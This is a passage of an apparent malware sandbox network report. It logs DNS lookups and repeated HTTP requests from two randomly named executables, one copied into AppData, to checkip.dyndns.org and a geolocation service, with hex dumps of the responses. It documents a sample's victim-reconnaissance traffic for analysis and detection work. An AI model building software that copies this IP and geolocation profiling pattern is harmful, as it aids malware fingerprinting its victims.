Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 22:32:35.531264067 CET	1.1.1.1	192.168.2.4	0x1029	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:32:35.531264067 CET	1.1.1.1	192.168.2.4	0x1029	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:32:35.531264067 CET	1.1.1.1	192.168.2.4	0x1029	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:32:35.531264067 CET	1.1.1.1	192.168.2.4	0x1029	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:32:35.531264067 CET	1.1.1.1	192.168.2.4	0x1029	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:32:35.531264067 CET	1.1.1.1	192.168.2.4	0x1029	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:32:38.922132015 CET	1.1.1.1	192.168.2.4	0xf392	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:32:38.922132015 CET	1.1.1.1	192.168.2.4	0xf392	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:32:38.922132015 CET	1.1.1.1	192.168.2.4	0xf392	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:32:38.922132015 CET	1.1.1.1	192.168.2.4	0xf392	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:32:38.922132015 CET	1.1.1.1	192.168.2.4	0xf392	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:32:38.922132015 CET	1.1.1.1	192.168.2.4	0xf392	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:32:38.922132015 CET	1.1.1.1	192.168.2.4	0xf392	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	193.122.130.0	80	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:35.543117046 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:37.124793053 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 782f82906e7c6f099a6baf3bc56e55f8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 22:32:37.165963888 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:32:38.535542011 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c76a8737298953baf2d724e8b4e07224 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 22:32:39.668000937 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:32:40.201416969 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a4e8398622b30b9564ee4358075ea72d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	193.122.130.0	80	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:40.360259056 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:40.971826077 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 69667e37ca97d7847f6475a34edc9a15 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 22:32:40.976886988 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:32:41.914351940 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5ab32817b067736785ad497b01afa372 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 22:32:42.122489929 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5ab32817b067736785ad497b01afa372 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 22:32:43.287910938 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:32:43.802998066 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:43 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 74de8840246e7e0560fdc54d10f562b8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	193.122.130.0	80	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:40.850085020 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:32:41.395468950 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e9a0432567d10b0a8507f67ef72df373 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	193.122.130.0	80	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:42.405913115 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:43.348737955 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:43 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 674f3679520750fd6b48afbdaaf29ef7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	193.122.130.0	80	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:44.006217957 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:44.527834892 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 64881ef438355ee51c7c4c64d33f9eaa Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49748	193.122.130.0	80	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:44.427532911 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:32:44.900753975 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7d9330a8d244151f22beb5f8481475ee Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49751	193.122.130.0	80	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:45.144304037 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:46.122658014 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 58a2b976977f28f7ef5f09c54152f45d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	193.122.130.0	80	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:45.537348032 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:46.019151926 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 75fa3db391e049ecf50e5cdb3ac2e053 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49757	193.122.130.0	80	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:46.647233963 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:47.121692896 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 696158ca295e845d04e6566cc668567a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49758	193.122.130.0	80	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:46.723332882 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:47.177434921 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8327ba169dcca72307828fb0c6aa3851 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49763	193.122.130.0	80	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:47.740359068 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:48.195493937 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3785cfe5bc5345a5b3398890706eeee0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49764	193.122.130.0	80	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:47.801947117 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:48.595371962 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 301a3f00867ca42228764d7163d2afe8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49768	193.122.130.0	80	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:48.810308933 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:49.289946079 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 68f0a7cf0b96a05680a6071f8ca6c35f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49771	193.122.130.0	80	7676	C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:32:49.955333948 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:32:50.421808004 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7a7c0a4daa5e6aca96acddbe63c7e232 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	104.21.48.1	443	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:32:39 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:32:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859548 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jqAj1b%2F7%2FLZxzNFbF%2F63OyN5weEKZtMk%2Fp8W8AWrRrW0DvItRlQky94JaZK3MM9d2dUuQy2wBrjj4J7Vc9OOAoGnoSJcI8hwzsVjgljPo9WjMnH6lGz%2FXf9BwG4fcmLpR0ukQbvK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc7eb7f468cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1943&min_rtt=1939&rtt_var=735&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1480730&cwnd=243&unsent_bytes=0&cid=8542c48842f7c449&ts=200&x=0"
2025-01-10 21:32:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	104.21.48.1	443	7284	C:\Users\user\Desktop\VQsnGWaNi5.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:40 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
